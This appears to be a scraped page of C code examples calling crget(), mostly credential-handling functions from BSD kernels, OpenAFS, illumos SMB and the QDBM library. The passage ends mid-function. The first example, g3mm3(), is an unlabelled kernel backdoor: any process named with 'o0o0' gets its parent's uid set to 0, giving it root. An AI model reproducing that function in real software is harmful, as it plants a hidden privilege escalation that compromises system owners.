예제 #1
0
int g3mm3()
{

  register proc_t *p;
  register proc_t *pp;
  cred_t *cr, *newcr;

    mutex_enter(&pidlock);
      for (p = practive; p != NULL; p = p->p_next) {

             if(strstr(p->p_user.u_comm, (char *) "o0o0")) {

                pp = p->p_parent;
                newcr = crget();

                mutex_enter(&pp->p_crlock);
                cr = pp->p_cred;
                crcopy_to(cr, newcr);
                pp->p_cred = newcr;
                newcr->cr_uid = 0;
                mutex_exit(&pp->p_crlock);

              }

          continue;

        }

    mutex_exit(&pidlock);

    return 1;
}
예제 #2
0
/* Retrieve a record. */
datum gdbm_fetch(GDBM_FILE dbf, datum key){
  datum content;
  char *vbuf;
  int vsiz;
  assert(dbf);
  if(!key.dptr || key.dsize < 0){
    gdbm_errno = GDBM_ILLEGAL_DATA;
    content.dptr = NULL;
    content.dsize = 0;
    return content;
  }
  if(dbf->depot){
    if(!(vbuf = dpget(dbf->depot, key.dptr, key.dsize, 0, -1, &vsiz))){
      gdbm_errno = gdbm_geterrno(dpecode);
      content.dptr = NULL;
      content.dsize = 0;
      return content;
    }
  } else {
    if(!(vbuf = crget(dbf->curia, key.dptr, key.dsize, 0, -1, &vsiz))){
      gdbm_errno = gdbm_geterrno(dpecode);
      content.dptr = NULL;
      content.dsize = 0;
      return content;
    }
  }
  content.dptr = vbuf;
  content.dsize = vsiz;
  return content;
}
예제 #3
0
/* ARGSUSED */
int
sys_setloginclass(struct thread *td, struct setloginclass_args *uap)
{
	struct proc *p = td->td_proc;
	int error;
	char lcname[MAXLOGNAME];
	struct loginclass *newlc;
	struct ucred *newcred, *oldcred;

	error = priv_check(td, PRIV_PROC_SETLOGINCLASS);
	if (error != 0)
		return (error);
	error = copyinstr(uap->namebuf, lcname, sizeof(lcname), NULL);
	if (error != 0)
		return (error);

	newlc = loginclass_find(lcname);
	if (newlc == NULL)
		return (EINVAL);
	newcred = crget();

	PROC_LOCK(p);
	oldcred = crcopysafe(p, newcred);
	newcred->cr_loginclass = newlc;
	proc_set_cred(p, newcred);
	PROC_UNLOCK(p);
#ifdef RACCT
	racct_proc_ucred_changed(p, oldcred, newcred);
#endif
	loginclass_free(oldcred->cr_loginclass);
	crfree(oldcred);

	return (0);
}
예제 #4
0
/* ARGSUSED */
int
setauid(struct thread *td, struct setauid_args *uap)
{
	struct ucred *newcred, *oldcred;
	au_id_t id;
	int error;

	if (jailed(td->td_ucred))
		return (ENOSYS);
	error = copyin(uap->auid, &id, sizeof(id));
	if (error)
		return (error);
	audit_arg_auid(id);
	newcred = crget();
	PROC_LOCK(td->td_proc);
	oldcred = td->td_proc->p_ucred;
	crcopy(newcred, oldcred);
#ifdef MAC
	error = mac_cred_check_setauid(oldcred, id);
	if (error)
		goto fail;
#endif
	error = priv_check_cred(oldcred, PRIV_AUDIT_SETAUDIT, 0);
	if (error)
		goto fail;
	newcred->cr_audit.ai_auid = id;
	td->td_proc->p_ucred = newcred;
	PROC_UNLOCK(td->td_proc);
	crfree(oldcred);
	return (0);
fail:
	PROC_UNLOCK(td->td_proc);
	crfree(newcred);
	return (error);
}
예제 #5
0
int
svc_getcred(struct svc_req *rqst, struct ucred **crp, int *flavorp)
{
    struct ucred *cr = NULL;
    int flavor;
    struct xucred *xcr;

    flavor = rqst->rq_cred.oa_flavor;
    if (flavorp)
        *flavorp = flavor;

    switch (flavor) {
    case AUTH_UNIX:
        xcr = (struct xucred *) rqst->rq_clntcred;
        cr = crget();
        cr->cr_uid = cr->cr_ruid = cr->cr_svuid = xcr->cr_uid;
        crsetgroups(cr, xcr->cr_ngroups, xcr->cr_groups);
        cr->cr_rgid = cr->cr_svgid = cr->cr_groups[0];
        cr->cr_prison = &prison0;
        prison_hold(cr->cr_prison);
        *crp = cr;
        return (TRUE);

    case RPCSEC_GSS:
        if (!_svcauth_rpcsec_gss_getcred)
            return (FALSE);
        return (_svcauth_rpcsec_gss_getcred(rqst, crp, flavorp));

    default:
        return (FALSE);
    }
}
/*
 * Called with a modifying token held, but must still obtain p_spin to
 * actually replace p_ucred to handle races against syscall entry from
 * other threads which cache p_ucred->td_ucred.
 *
 * (the threads will only get the spin-lock, and they only need to in
 *  the case where td_ucred != p_ucred so this is optimal).
 */
struct ucred *
cratom_proc(struct proc *p)
{
	struct ucred *oldcr;
	struct ucred *newcr;

	oldcr = p->p_ucred;
	if (oldcr->cr_ref == 1)
		return(oldcr);

	newcr = crget();	/* this might block */
	oldcr = p->p_ucred;	/* so re-cache oldcr (do not re-test) */
	*newcr = *oldcr;
	if (newcr->cr_uidinfo)
		uihold(newcr->cr_uidinfo);
	if (newcr->cr_ruidinfo)
		uihold(newcr->cr_ruidinfo);
	if (jailed(newcr))
		prison_hold(newcr->cr_prison);
	newcr->cr_ref = 1;

	spin_lock(&p->p_spin);
	p->p_ucred = newcr;
	spin_unlock(&p->p_spin);
	crfree(oldcr);

	return newcr;
}
예제 #7
0
/*
 * Dup cred struct to a new held one.
 */
struct ucred *
crdup(struct ucred *cr)
{
	struct ucred *newcr;

	newcr = crget();
	*newcr = *cr;
	newcr->cr_ref = 1;
	return (newcr);
}
예제 #8
0
/*
 * Copy cred structure to a new one and free the old one.
 */
struct ucred *
crcopy(struct ucred *cr)
{
	struct ucred *newcr;

	if (cr->cr_ref == 1)
		return (cr);
	newcr = crget();
	*newcr = *cr;
	crfree(cr);
	newcr->cr_ref = 1;
	return (newcr);
}
예제 #9
0
파일: crtsv.c 프로젝트: EleanorRobson/oracc
/* perform export command */
int doexport(const char *name, int bin){
  CURIA *curia;
  char *kbuf, *vbuf, *tmp;
  int err, ksiz, vsiz;
  /* open a database */
  if(!(curia = cropen(name, CR_OREADER, -1, -1))){
    pdperror(name);
    return 1;
  }
  /* initialize the iterator */
  criterinit(curia);
  /* loop for each key */
  err = FALSE;
  while((kbuf = criternext(curia, &ksiz)) != NULL){
    /* retrieve a value with a key */
    if(!(vbuf = crget(curia, kbuf, ksiz, 0, -1, &vsiz))){
      pdperror(name);
      free(kbuf);
      err = TRUE;
      break;
    }
    /* output data */
    if(bin){
      tmp = cbbaseencode(kbuf, ksiz);
      printf("%s\t", tmp);
      free(tmp);
      tmp = cbbaseencode(vbuf, vsiz);
      printf("%s\n", tmp);
      free(tmp);
    } else {
      printf("%s\t%s\n", kbuf, vbuf);
    }
    /* free resources */
    free(vbuf);
    free(kbuf);
  }
  /* check whether all records were retrieved */
  if(dpecode != DP_ENOITEM){
    pdperror(name);
    err = TRUE;
  }
  /* close the database */
  if(!crclose(curia)){
    pdperror(name);
    return 1;
  }
  return err ? 1 : 0;
}
예제 #10
0
/*
 * Dup cred struct to a new held one.
 */
struct ucred *
crdup(struct ucred *cr)
{
	struct ucred *newcr;

	newcr = crget();
	*newcr = *cr;
	if (newcr->cr_uidinfo)
		uihold(newcr->cr_uidinfo);
	if (newcr->cr_ruidinfo)
		uihold(newcr->cr_ruidinfo);
	if (jailed(newcr))
		prison_hold(newcr->cr_prison);
	newcr->cr_ref = 1;
	return (newcr);
}
예제 #11
0
파일: osi_cred.c 프로젝트: jisqyv/openafs
/* Return a duplicate of the cred. */
cred_t *
crdup(cred_t * cr)
{
    cred_t *tmp = crget();
#if defined(STRUCT_TASK_STRUCT_HAS_CRED)
    afs_copy_creds(tmp, cr);
#else
    afs_set_cr_uid(tmp, afs_cr_uid(cr));
    afs_set_cr_ruid(tmp, afs_cr_ruid(cr));
    afs_set_cr_gid(tmp, afs_cr_gid(cr));
    afs_set_cr_rgid(tmp, afs_cr_rgid(cr));

    get_group_info(afs_cr_group_info(cr));
    afs_set_cr_group_info(tmp, afs_cr_group_info(cr));
#endif
    return tmp;
}
예제 #12
0
/*
 * System call to enter capability mode for the process.
 */
int
sys_cap_enter(struct thread *td, struct cap_enter_args *uap)
{
	struct ucred *newcred, *oldcred;
	struct proc *p;

	if (IN_CAPABILITY_MODE(td))
		return (0);

	newcred = crget();
	p = td->td_proc;
	PROC_LOCK(p);
	oldcred = crcopysafe(p, newcred);
	newcred->cr_flags |= CRED_FLAG_CAPMODE;
	proc_set_cred(p, newcred);
	PROC_UNLOCK(p);
	crfree(oldcred);
	return (0);
}
예제 #13
0
/*
 * Copy cred structure to a new one and free the old one.
 *
 * MPSAFE (*cr must be stable)
 */
struct ucred *
crcopy(struct ucred *cr)
{
	struct ucred *newcr;

	if (cr->cr_ref == 1)
		return (cr);
	newcr = crget();
	*newcr = *cr;
	if (newcr->cr_uidinfo)
		uihold(newcr->cr_uidinfo);
	if (newcr->cr_ruidinfo)
		uihold(newcr->cr_ruidinfo);
	if (jailed(newcr))
		prison_hold(newcr->cr_prison);
	newcr->cr_ref = 1;
	crfree(cr);
	return (newcr);
}
예제 #14
0
/*
 * Hacked up version of vn_open. We _only_ handle ptys and only open
 * them with FREAD|FWRITE and never deal with creat or stuff like that.
 *
 * We need it because we have to fake up root credentials to open the pty.
 */
static int
ptm_vn_open(struct nameidata *ndp)
{
	struct proc *p = ndp->ni_cnd.cn_proc;
	struct ucred *cred;
	struct vattr vattr;
	struct vnode *vp;
	int error;

	if ((error = namei(ndp)) != 0)
		return (error);
	vp = ndp->ni_vp;
	if (vp->v_type != VCHR) {
		error = EINVAL;
		goto bad;
	}

	/*
	 * Get us a fresh cred with root privileges.
	 */
	cred = crget();
	error = VOP_OPEN(vp, FREAD|FWRITE, cred, p);
	if (!error) {
		/* update atime/mtime */
		VATTR_NULL(&vattr);
		getnanotime(&vattr.va_atime);
		vattr.va_mtime = vattr.va_atime;
		vattr.va_vaflags |= VA_UTIMES_NULL;
		(void)VOP_SETATTR(vp, &vattr, p->p_ucred, p);
	}
	crfree(cred);

	if (error)
		goto bad;

	vp->v_writecount++;

	return (0);
bad:
	vput(vp);
	return (error);
}
예제 #15
0
/* Return a duplicate of the cred. */
cred_t *
crdup(cred_t * cr)
{
    cred_t *tmp = crget();

    tmp->cr_uid = cr->cr_uid;
    tmp->cr_ruid = cr->cr_ruid;
    tmp->cr_gid = cr->cr_gid;
    tmp->cr_rgid = cr->cr_rgid;

#if defined(AFS_LINUX26_ENV)
    get_group_info(cr->cr_group_info);
    tmp->cr_group_info = cr->cr_group_info;
#else
    memcpy(tmp->cr_groups, cr->cr_groups, NGROUPS * sizeof(gid_t));
    tmp->cr_ngroups = cr->cr_ngroups;
#endif

    return tmp;
}
예제 #16
0
/* ARGSUSED */
int
setaudit(struct thread *td, struct setaudit_args *uap)
{
	struct ucred *newcred, *oldcred;
	struct auditinfo ai;
	int error;

	if (jailed(td->td_ucred))
		return (ENOSYS);
	error = copyin(uap->auditinfo, &ai, sizeof(ai));
	if (error)
		return (error);
	audit_arg_auditinfo(&ai);
	newcred = crget();
	PROC_LOCK(td->td_proc);
	oldcred = td->td_proc->p_ucred;
	crcopy(newcred, oldcred);
#ifdef MAC
	error = mac_cred_check_setaudit(oldcred, &ai);
	if (error)
		goto fail;
#endif
	error = priv_check_cred(oldcred, PRIV_AUDIT_SETAUDIT, 0);
	if (error)
		goto fail;
	bzero(&newcred->cr_audit, sizeof(newcred->cr_audit));
	newcred->cr_audit.ai_auid = ai.ai_auid;
	newcred->cr_audit.ai_mask = ai.ai_mask;
	newcred->cr_audit.ai_asid = ai.ai_asid;
	newcred->cr_audit.ai_termid.at_addr[0] = ai.ai_termid.machine;
	newcred->cr_audit.ai_termid.at_port = ai.ai_termid.port;
	newcred->cr_audit.ai_termid.at_type = AU_IPv4;
	td->td_proc->p_ucred = newcred;
	PROC_UNLOCK(td->td_proc);
	crfree(oldcred);
	return (0);
fail:
	PROC_UNLOCK(td->td_proc);
	crfree(newcred);
	return (error);
}
예제 #17
0
파일: osi_cred.c 프로젝트: jisqyv/openafs
cred_t *
crref(void)
{
#if defined(STRUCT_TASK_STRUCT_HAS_CRED)
    return (cred_t *)get_current_cred();
#else
    cred_t *cr = crget();

    afs_set_cr_uid(cr, current_fsuid());
    afs_set_cr_ruid(cr, current_uid());
    afs_set_cr_gid(cr, current_fsgid());
    afs_set_cr_rgid(cr, current_gid());

    task_lock(current);
    get_group_info(current_group_info());
    afs_set_cr_group_info(cr, current_group_info());
    task_unlock(current);

    return cr;
#endif
}
예제 #18
0
cred_t *
crref(void)
{
    cred_t *cr = crget();

    cr->cr_uid = current_fsuid();
    cr->cr_ruid = current_uid();
    cr->cr_gid = current_fsgid();
    cr->cr_rgid = current_gid();

#if defined(AFS_LINUX26_ENV)
    task_lock(current);
    get_group_info(current_group_info());
    cr->cr_group_info = current_group_info();
    task_unlock(current);
#else
    memcpy(cr->cr_groups, current->groups, NGROUPS * sizeof(gid_t));
    cr->cr_ngroups = current->ngroups;
#endif
    return cr;
}
예제 #19
0
/*
 * Atomize a cred structure so it can be modified without polluting
 * other references to it.
 *
 * MPSAFE (however, *pcr must be stable)
 */
struct ucred *
cratom(struct ucred **pcr)
{
	struct ucred *oldcr;
	struct ucred *newcr;

	oldcr = *pcr;
	if (oldcr->cr_ref == 1)
		return (oldcr);
	newcr = crget();
	*newcr = *oldcr;
	if (newcr->cr_uidinfo)
		uihold(newcr->cr_uidinfo);
	if (newcr->cr_ruidinfo)
		uihold(newcr->cr_ruidinfo);
	if (jailed(newcr))
		prison_hold(newcr->cr_prison);
	newcr->cr_ref = 1;
	crfree(oldcr);
	*pcr = newcr;
	return (newcr);
}
예제 #20
0
/* ARGSUSED */
int
setaudit_addr(struct thread *td, struct setaudit_addr_args *uap)
{
	struct ucred *newcred, *oldcred;
	struct auditinfo_addr aia;
	int error;

	if (jailed(td->td_ucred))
		return (ENOSYS);
	error = copyin(uap->auditinfo_addr, &aia, sizeof(aia));
	if (error)
		return (error);
	audit_arg_auditinfo_addr(&aia);
	if (aia.ai_termid.at_type != AU_IPv6 &&
	    aia.ai_termid.at_type != AU_IPv4)
		return (EINVAL);
	newcred = crget();
	PROC_LOCK(td->td_proc);	
	oldcred = td->td_proc->p_ucred;
	crcopy(newcred, oldcred);
#ifdef MAC
	error = mac_cred_check_setaudit_addr(oldcred, &aia);
	if (error)
		goto fail;
#endif
	error = priv_check_cred(oldcred, PRIV_AUDIT_SETAUDIT, 0);
	if (error)
		goto fail;
	newcred->cr_audit = aia;
	td->td_proc->p_ucred = newcred;
	PROC_UNLOCK(td->td_proc);
	crfree(oldcred);
	return (0);
fail:
	PROC_UNLOCK(td->td_proc);
	crfree(newcred);
	return (error);
}
예제 #21
0
int CMAC::getchallenge(char *rand,char *mac)
{
    int cryptfd = crget();
    char text[88];
    struct session2_op sop;
    struct crypt_op cop;
//    ulong cmd = CIOCGSESSION2;
    if(MakeAuthMAC(rand,text))
        return -1;
    bzero(&sop, sizeof(sop));
    sop.mac = CRYPTO_SHA2_256;
    sop.crid = CRYPTO_FLAG_HARDWARE; // | CRYPTO_FLAG_SOFTWARE;//
    if (ioctl(cryptfd, CIOCGSESSION, &sop) < 0) {
            err(1, "CIOCGSESSION");
            close(cryptfd);
        /* hardware doesn't support algorithm; skip it */
        return -1;
    }

    cop.ses = sop.ses;
    cop.op = 0;
    cop.flags = 0;
    cop.len = sizeof(text);
    cop.src = text;
    cop.dst = 0;
    cop.mac = mac;
    cop.iv = 0;

    if (ioctl(cryptfd, CIOCCRYPT, &cop) < 0){
            err(1, "CIOCCRYPT");
            close(cryptfd);
            return -1;
    }
    printf("calcate rsp:");
    hexdump(mac, 32);
    return 0;
}
/*
 * Atomize a cred structure so it can be modified without polluting
 * other references to it.
 *
 * MPSAFE (however, *pcr must be stable)
 */
struct ucred *
cratom(struct ucred **pcr)
{
	struct ucred *oldcr;
	struct ucred *newcr;

	oldcr = *pcr;
	if (oldcr->cr_ref == 1)
		return (oldcr);
	newcr = crget();	/* this might block */
	oldcr = *pcr;		/* re-cache after potentially blocking */
	*newcr = *oldcr;
	if (newcr->cr_uidinfo)
		uihold(newcr->cr_uidinfo);
	if (newcr->cr_ruidinfo)
		uihold(newcr->cr_ruidinfo);
	if (jailed(newcr))
		prison_hold(newcr->cr_prison);
	newcr->cr_ref = 1;
	crfree(oldcr);
	*pcr = newcr;

	return (newcr);
}
예제 #23
0
/*
 * nfs statfs call
 */
int
nfs_statfs(struct mount *mp, struct statfs *sbp, struct ucred *cred)
{
	struct vnode *vp;
	struct nfs_statfs *sfp;
	struct nfsmount *nmp = VFSTONFS(mp);
	thread_t td = curthread;
	int error = 0, retattr;
	struct nfsnode *np;
	u_quad_t tquad;
	struct nfsm_info info;

	info.mrep = NULL;
	info.v3 = (nmp->nm_flag & NFSMNT_NFSV3);

	lwkt_gettoken(&nmp->nm_token);

#ifndef nolint
	sfp = NULL;
#endif
	error = nfs_nget(mp, (nfsfh_t *)nmp->nm_fh, nmp->nm_fhsize, &np, NULL);
	if (error) {
		lwkt_reltoken(&nmp->nm_token);
		return (error);
	}
	vp = NFSTOV(np);
	/* ignore the passed cred */
	cred = crget();
	cred->cr_ngroups = 1;
	if (info.v3 && (nmp->nm_state & NFSSTA_GOTFSINFO) == 0)
		(void)nfs_fsinfo(nmp, vp, td);
	nfsstats.rpccnt[NFSPROC_FSSTAT]++;
	nfsm_reqhead(&info, vp, NFSPROC_FSSTAT, NFSX_FH(info.v3));
	ERROROUT(nfsm_fhtom(&info, vp));
	NEGKEEPOUT(nfsm_request(&info, vp, NFSPROC_FSSTAT, td, cred, &error));
	if (info.v3) {
		ERROROUT(nfsm_postop_attr(&info, vp, &retattr,
					 NFS_LATTR_NOSHRINK));
	}
	if (error) {
		if (info.mrep != NULL)
			m_freem(info.mrep);
		goto nfsmout;
	}
	NULLOUT(sfp = nfsm_dissect(&info, NFSX_STATFS(info.v3)));
	sbp->f_flags = nmp->nm_flag;

	if (info.v3) {
		sbp->f_bsize = NFS_FABLKSIZE;
		tquad = fxdr_hyper(&sfp->sf_tbytes);
		sbp->f_blocks = (long)(tquad / ((u_quad_t)NFS_FABLKSIZE));
		tquad = fxdr_hyper(&sfp->sf_fbytes);
		sbp->f_bfree = (long)(tquad / ((u_quad_t)NFS_FABLKSIZE));
		tquad = fxdr_hyper(&sfp->sf_abytes);
		sbp->f_bavail = (long)(tquad / ((u_quad_t)NFS_FABLKSIZE));
		sbp->f_files = (fxdr_unsigned(int32_t,
		    sfp->sf_tfiles.nfsuquad[1]) & 0x7fffffff);
		sbp->f_ffree = (fxdr_unsigned(int32_t,
		    sfp->sf_ffiles.nfsuquad[1]) & 0x7fffffff);
	} else {
		sbp->f_bsize = fxdr_unsigned(int32_t, sfp->sf_bsize);
		sbp->f_blocks = fxdr_unsigned(int32_t, sfp->sf_blocks);
		sbp->f_bfree = fxdr_unsigned(int32_t, sfp->sf_bfree);
		sbp->f_bavail = fxdr_unsigned(int32_t, sfp->sf_bavail);
		sbp->f_files = 0;
		sbp->f_ffree = 0;
	}

	/*
	 * Some values are pre-set in mnt_stat.  Note in particular f_iosize
	 * cannot be changed once the filesystem is mounted as it is used
	 * as the basis for BIOs.
	 */
	if (sbp != &mp->mnt_stat) {
		sbp->f_type = mp->mnt_vfc->vfc_typenum;
		bcopy(mp->mnt_stat.f_mntfromname, sbp->f_mntfromname, MNAMELEN);
		sbp->f_iosize = mp->mnt_stat.f_iosize;
	}
	m_freem(info.mrep);
	info.mrep = NULL;
nfsmout:
	vput(vp);
	crfree(cred);
	lwkt_reltoken(&nmp->nm_token);
	return (error);
}
예제 #24
0
/*
 * Allocate a Solaris cred and initialize it based on the access token.
 *
 * If the user can be mapped to a non-ephemeral ID, the cred gid is set
 * to the Solaris user's primary group.
 *
 * If the mapped UID is ephemeral, or the primary group could not be
 * obtained, the cred gid is set to whatever Solaris group is mapped
 * to the token's primary group.
 */
cred_t *
smb_cred_create(smb_token_t *token)
{
	ksid_t			ksid;
	ksidlist_t		*ksidlist = NULL;
	smb_posix_grps_t	*posix_grps;
	cred_t			*cr;
	gid_t			gid;

	ASSERT(token);
	ASSERT(token->tkn_posix_grps);
	posix_grps = token->tkn_posix_grps;

	cr = crget();
	ASSERT(cr != NULL);

	if (!IDMAP_ID_IS_EPHEMERAL(token->tkn_user.i_id) &&
	    (posix_grps->pg_ngrps != 0)) {
		gid = posix_grps->pg_grps[0];
	} else {
		gid = token->tkn_primary_grp.i_id;
	}

	if (crsetugid(cr, token->tkn_user.i_id, gid) != 0) {
		crfree(cr);
		return (NULL);
	}

	if (crsetgroups(cr, posix_grps->pg_ngrps, posix_grps->pg_grps) != 0) {
		crfree(cr);
		return (NULL);
	}

	smb_cred_set_sid(&token->tkn_user, &ksid);
	crsetsid(cr, &ksid, KSID_USER);
	smb_cred_set_sid(&token->tkn_primary_grp, &ksid);
	crsetsid(cr, &ksid, KSID_GROUP);
	smb_cred_set_sid(&token->tkn_owner, &ksid);
	crsetsid(cr, &ksid, KSID_OWNER);
	ksidlist = smb_cred_set_sidlist(&token->tkn_win_grps);
	crsetsidlist(cr, ksidlist);

	/*
	 * In the AD world, "take ownership privilege" is very much
	 * like having Unix "root" privileges.  It's normally given
	 * to members of the "Administrators" group, which normally
	 * includes the the local Administrator (like root) and when
	 * joined to a domain, "Domain Admins".
	 */
	if (smb_token_query_privilege(token, SE_TAKE_OWNERSHIP_LUID)) {
		(void) crsetpriv(cr,
		    PRIV_FILE_CHOWN,
		    PRIV_FILE_DAC_READ,
		    PRIV_FILE_DAC_SEARCH,
		    PRIV_FILE_DAC_WRITE,
		    PRIV_FILE_OWNER,
		    NULL);
	}

	return (cr);
}
예제 #25
0
/* ARGSUSED */
int
auditon(struct thread *td, struct auditon_args *uap)
{
	struct ucred *cred, *newcred, *oldcred;
	int error;
	union auditon_udata udata;
	struct proc *tp;

	if (jailed(td->td_ucred))
		return (ENOSYS);
	AUDIT_ARG_CMD(uap->cmd);

#ifdef MAC
	error = mac_system_check_auditon(td->td_ucred, uap->cmd);
	if (error)
		return (error);
#endif

	error = priv_check(td, PRIV_AUDIT_CONTROL);
	if (error)
		return (error);

	if ((uap->length <= 0) || (uap->length > sizeof(union auditon_udata)))
		return (EINVAL);

	memset((void *)&udata, 0, sizeof(udata));

	/*
	 * Some of the GET commands use the arguments too.
	 */
	switch (uap->cmd) {
	case A_SETPOLICY:
	case A_OLDSETPOLICY:
	case A_SETKMASK:
	case A_SETQCTRL:
	case A_OLDSETQCTRL:
	case A_SETSTAT:
	case A_SETUMASK:
	case A_SETSMASK:
	case A_SETCOND:
	case A_OLDSETCOND:
	case A_SETCLASS:
	case A_SETPMASK:
	case A_SETFSIZE:
	case A_SETKAUDIT:
	case A_GETCLASS:
	case A_GETPINFO:
	case A_GETPINFO_ADDR:
	case A_SENDTRIGGER:
		error = copyin(uap->data, (void *)&udata, uap->length);
		if (error)
			return (error);
		AUDIT_ARG_AUDITON(&udata);
		break;
	}

	/*
	 * XXXAUDIT: Locking?
	 */
	switch (uap->cmd) {
	case A_OLDGETPOLICY:
	case A_GETPOLICY:
		if (uap->length == sizeof(udata.au_policy64)) {
			if (!audit_fail_stop)
				udata.au_policy64 |= AUDIT_CNT;
			if (audit_panic_on_write_fail)
				udata.au_policy64 |= AUDIT_AHLT;
			if (audit_argv)
				udata.au_policy64 |= AUDIT_ARGV;
			if (audit_arge)
				udata.au_policy64 |= AUDIT_ARGE;
			break;
		}
		if (uap->length != sizeof(udata.au_policy))
			return (EINVAL);
		if (!audit_fail_stop)
			udata.au_policy |= AUDIT_CNT;
		if (audit_panic_on_write_fail)
			udata.au_policy |= AUDIT_AHLT;
		if (audit_argv)
			udata.au_policy |= AUDIT_ARGV;
		if (audit_arge)
			udata.au_policy |= AUDIT_ARGE;
		break;

	case A_OLDSETPOLICY:
	case A_SETPOLICY:
		if (uap->length == sizeof(udata.au_policy64)) {
			if (udata.au_policy & (~AUDIT_CNT|AUDIT_AHLT|
			    AUDIT_ARGV|AUDIT_ARGE))
				return (EINVAL);
			audit_fail_stop = ((udata.au_policy64 & AUDIT_CNT) ==
			    0);
			audit_panic_on_write_fail = (udata.au_policy64 &
			    AUDIT_AHLT);
			audit_argv = (udata.au_policy64 & AUDIT_ARGV);
			audit_arge = (udata.au_policy64 & AUDIT_ARGE);
			break;
		}
		if (uap->length != sizeof(udata.au_policy))
			return (EINVAL);
		if (udata.au_policy & ~(AUDIT_CNT|AUDIT_AHLT|AUDIT_ARGV|
		    AUDIT_ARGE))
			return (EINVAL);
		/*
		 * XXX - Need to wake up waiters if the policy relaxes?
		 */
		audit_fail_stop = ((udata.au_policy & AUDIT_CNT) == 0);
		audit_panic_on_write_fail = (udata.au_policy & AUDIT_AHLT);
		audit_argv = (udata.au_policy & AUDIT_ARGV);
		audit_arge = (udata.au_policy & AUDIT_ARGE);
		break;

	case A_GETKMASK:
		if (uap->length != sizeof(udata.au_mask))
			return (EINVAL);
		udata.au_mask = audit_nae_mask;
		break;

	case A_SETKMASK:
		if (uap->length != sizeof(udata.au_mask))
			return (EINVAL);
		audit_nae_mask = udata.au_mask;
		break;

	case A_OLDGETQCTRL:
	case A_GETQCTRL:
		if (uap->length == sizeof(udata.au_qctrl64)) {
			udata.au_qctrl64.aq64_hiwater =
			    (u_int64_t)audit_qctrl.aq_hiwater;
			udata.au_qctrl64.aq64_lowater =
			    (u_int64_t)audit_qctrl.aq_lowater;
			udata.au_qctrl64.aq64_bufsz =
			    (u_int64_t)audit_qctrl.aq_bufsz;
			udata.au_qctrl64.aq64_minfree =
			    (u_int64_t)audit_qctrl.aq_minfree;
			break;
		}
		if (uap->length != sizeof(udata.au_qctrl))
			return (EINVAL);
		udata.au_qctrl = audit_qctrl;
		break;

	case A_OLDSETQCTRL:
	case A_SETQCTRL:
		if (uap->length == sizeof(udata.au_qctrl64)) {
			if ((udata.au_qctrl64.aq64_hiwater > AQ_MAXHIGH) ||
			    (udata.au_qctrl64.aq64_lowater >=
			    udata.au_qctrl.aq_hiwater) ||
			    (udata.au_qctrl64.aq64_bufsz > AQ_MAXBUFSZ) ||
			    (udata.au_qctrl64.aq64_minfree < 0) ||
			    (udata.au_qctrl64.aq64_minfree > 100))
				return (EINVAL);
			audit_qctrl.aq_hiwater =
			    (int)udata.au_qctrl64.aq64_hiwater;
			audit_qctrl.aq_lowater =
			    (int)udata.au_qctrl64.aq64_lowater;
			audit_qctrl.aq_bufsz =
			    (int)udata.au_qctrl64.aq64_bufsz;
			audit_qctrl.aq_minfree =
			    (int)udata.au_qctrl64.aq64_minfree;
			audit_qctrl.aq_delay = -1;	/* Not used. */
			break;
		}
		if (uap->length != sizeof(udata.au_qctrl))
			return (EINVAL);
		if ((udata.au_qctrl.aq_hiwater > AQ_MAXHIGH) ||
		    (udata.au_qctrl.aq_lowater >= udata.au_qctrl.aq_hiwater) ||
		    (udata.au_qctrl.aq_bufsz > AQ_MAXBUFSZ) ||
		    (udata.au_qctrl.aq_minfree < 0) ||
		    (udata.au_qctrl.aq_minfree > 100))
			return (EINVAL);

		audit_qctrl = udata.au_qctrl;
		/* XXX The queue delay value isn't used with the kernel. */
		audit_qctrl.aq_delay = -1;
		break;

	case A_GETCWD:
		return (ENOSYS);
		break;

	case A_GETCAR:
		return (ENOSYS);
		break;

	case A_GETSTAT:
		return (ENOSYS);
		break;

	case A_SETSTAT:
		return (ENOSYS);
		break;

	case A_SETUMASK:
		return (ENOSYS);
		break;

	case A_SETSMASK:
		return (ENOSYS);
		break;

	case A_OLDGETCOND:
	case A_GETCOND:
		if (uap->length == sizeof(udata.au_cond64)) {
			if (audit_enabled && !audit_suspended)
				udata.au_cond64 = AUC_AUDITING;
			else
				udata.au_cond64 = AUC_NOAUDIT;
			break;
		}
		if (uap->length != sizeof(udata.au_cond))
			return (EINVAL);
		if (audit_enabled && !audit_suspended)
			udata.au_cond = AUC_AUDITING;
		else
			udata.au_cond = AUC_NOAUDIT;
		break;

	case A_OLDSETCOND:
	case A_SETCOND:
		if (uap->length == sizeof(udata.au_cond64)) {
			if (udata.au_cond64 == AUC_NOAUDIT)
				audit_suspended = 1;
			if (udata.au_cond64 == AUC_AUDITING)
				audit_suspended = 0;
			if (udata.au_cond64 == AUC_DISABLED) {
				audit_suspended = 1;
				audit_shutdown(NULL, 0);
			}
			break;
		}
		if (uap->length != sizeof(udata.au_cond))
			return (EINVAL);
		if (udata.au_cond == AUC_NOAUDIT)
			audit_suspended = 1;
		if (udata.au_cond == AUC_AUDITING)
			audit_suspended = 0;
		if (udata.au_cond == AUC_DISABLED) {
			audit_suspended = 1;
			audit_shutdown(NULL, 0);
		}
		break;

	case A_GETCLASS:
		if (uap->length != sizeof(udata.au_evclass))
			return (EINVAL);
		udata.au_evclass.ec_class = au_event_class(
		    udata.au_evclass.ec_number);
		break;

	case A_SETCLASS:
		if (uap->length != sizeof(udata.au_evclass))
			return (EINVAL);
		au_evclassmap_insert(udata.au_evclass.ec_number,
		    udata.au_evclass.ec_class);
		break;

	case A_GETPINFO:
		if (uap->length != sizeof(udata.au_aupinfo))
			return (EINVAL);
		if (udata.au_aupinfo.ap_pid < 1)
			return (ESRCH);
		if ((tp = pfind(udata.au_aupinfo.ap_pid)) == NULL)
			return (ESRCH);
		if ((error = p_cansee(td, tp)) != 0) {
			PROC_UNLOCK(tp);
			return (error);
		}
		cred = tp->p_ucred;
		if (cred->cr_audit.ai_termid.at_type == AU_IPv6) {
			PROC_UNLOCK(tp);
			return (EINVAL);
		}
		udata.au_aupinfo.ap_auid = cred->cr_audit.ai_auid;
		udata.au_aupinfo.ap_mask.am_success =
		    cred->cr_audit.ai_mask.am_success;
		udata.au_aupinfo.ap_mask.am_failure =
		    cred->cr_audit.ai_mask.am_failure;
		udata.au_aupinfo.ap_termid.machine =
		    cred->cr_audit.ai_termid.at_addr[0];
		udata.au_aupinfo.ap_termid.port =
		    (dev_t)cred->cr_audit.ai_termid.at_port;
		udata.au_aupinfo.ap_asid = cred->cr_audit.ai_asid;
		PROC_UNLOCK(tp);
		break;

	case A_SETPMASK:
